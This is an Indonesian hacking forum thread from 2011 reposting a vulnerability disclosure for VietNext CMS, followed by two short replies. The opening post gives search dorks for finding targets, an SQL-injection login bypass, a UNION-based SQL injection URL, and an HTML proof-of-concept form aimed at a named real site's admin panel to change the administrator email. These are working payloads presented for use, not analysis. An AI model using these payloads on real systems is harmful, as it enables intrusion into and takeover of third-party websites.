|
| VietNext CMS Multiple Vulnerabilities | |
| | Pengirim | Message |
---|
Voldemort BC Security
Jumlah posting : 331 Points : 725 Reputation : 16 Join date : 04.07.11
| Subyek: VietNext CMS Multiple Vulnerabilities Tue Jul 05, 2011 1:33 am | |
| [+] Exploit Title:Multiple Vulnerabilities [+] Date: 2011 [+] script:VietNext cms [+] Software: http://vietnextco.com & http://vietnext.vn[+] Author : pentesters.ir [+] Website : WwW.PenTesters.IR[+] dorks :"Developed & Design By VietNext" and "Design by VietNext" --------------------------------------------------------------- vul1.Auth Bypass: /path/admin/login.php username:admin'or 'a'='a password:admin'or 'a'='a ------------------------------ vul2.sql injection: /path/?frame=product&cat=111%20union%20all%20select%200,1,concat(0x3a,database()),3,4,5,6,7,8,9,10,11,12,13-- ------------------------------ vul3.remote change admin mail. poc: - Code:
-
<html> <head> <body> <h2>coded by pentesters.ir</h2> <form method="post" name="frmForm" enctype="multipart/form-data" action="http://www.anq2011.org/admin/"> <input type="hidden" name="act" value="config_m"> <input type="hidden" name="id" value="3"> <input type="hidden" name="page" value=""> <table border="1" cellpadding="0" cellspacing="0" bordercolor="#0069A8" width="100%"> <tr> <td> <table border="0" cellpadding="2" bordercolor="#111111" width="100%" cellspacing="0"> <tr><td height="10"></td></tr> <tr> <td width="15%" class="smallfont" align="right"></td> <td width="1%" class="smallfont" align="center"><font color="#FF0000" size="2">*</font></td> <td width="83%" class="smallfont"> <input readonly value="adminEmail" type="text" name="txtCode" class="textbox" size="34"> </td> </tr> <tr> <td width="15%" class="smallfont" align="right">Title</td> <td width="1%" class="smallfont" align="center"></td> <td width="83%" class="smallfont"> <input value="Email" type="text" name="txtName" class="textbox" size="34"> </td> </tr> <tr> <td width="15%" class="smallfont" align="right">Value</td> <td width="1%" class="smallfont" align="center"></td> <td width="83%" class="smallfont"> <input value="vqa.hcm@gmail.com" type="text" name="txtDetail" class="textbox" size="34"> </td> </tr>
<tr> <td width="15%" class="smallfont"></td> <td width="1%" class="smallfont" align="center"></td> <td width="83%" class="smallfont"> <input type="submit" name="btnSave" VALUE="Update" class="button" onclick="return btnSave_onclick()"> </td> </body> </html> | |
| | | zer03s Administrator
Jumlah posting : 2471 Points : 4119 Reputation : 113 Join date : 13.12.10 Age : 32 Lokasi : /home/root/blackc0de
| Subyek: Re: VietNext CMS Multiple Vulnerabilities Tue Jul 12, 2011 12:58 am | |
| ijin nyimak om exploitnyaa | |
| | | BumiayuKita Administrator
Jumlah posting : 2456 Points : 3020 Reputation : 85 Join date : 06.02.11 Age : 34 Lokasi : bumiayu
| Subyek: Re: VietNext CMS Multiple Vulnerabilities Tue Jul 12, 2011 10:28 am | |
| ini apa exploit buat apa gan?? | |
| | | Sponsored content
| Subyek: Re: VietNext CMS Multiple Vulnerabilities | |
| |
| | | | VietNext CMS Multiple Vulnerabilities | |
|
Similar topics | |
|
| Permissions in this forum: | Anda tidak dapat menjawab topik
| |
| |
| Latest topics | » Baktrack TutorialSun Jul 28, 2019 2:26 am by kenta » aplikasi gambas pada linuxTue Apr 30, 2019 10:28 am by kenta » beli linux ubuntu terbaru di surabayaSun Mar 31, 2019 10:08 am by kenta » desain robotFri Jan 19, 2018 1:25 pm by kenta » membuat robot tidak susahFri Jan 19, 2018 1:15 pm by kenta » Salam.. Salam.. Salam..Thu Nov 30, 2017 7:42 am by BumiayuKita» teknologi penyaring udara dan airWed Oct 04, 2017 8:41 am by kenta » [CloudMILD] VPS SSD IIX 2X RAM + Xtra SSD SpaceMon Jul 24, 2017 10:46 am by BumiayuKita» cara menutup akses dari situs negatifTue Apr 04, 2017 1:04 pm by kenta » Aplikasi Google TalkMon Mar 20, 2017 3:00 am by BumiayuKita» Driver buat Webcam PC ?? merknya M-Tech,, Fri Jan 30, 2015 8:51 pm by aelgrim » Portal Blog,,,,,Sun Dec 14, 2014 12:38 am by robofics» Appteknodroid - Seputar Dunia AndroidMon Nov 10, 2014 11:32 pm by Pr0phecy » Software animasi yang agan2 pakeTue Sep 30, 2014 1:11 pm by X_campus » INDO BILLING 6.70 + KEYSun Sep 21, 2014 2:17 pm by abdul halim |
Statistics | Total 12294 user terdaftar User terdaftar terakhir adalah Adlygans
Total 31710 kiriman artikel dari user in 5734 subjects
|
Banner Forum | Dukung forum Blackc0de dengan memasang bannernya.
|
Social Networking |
|
|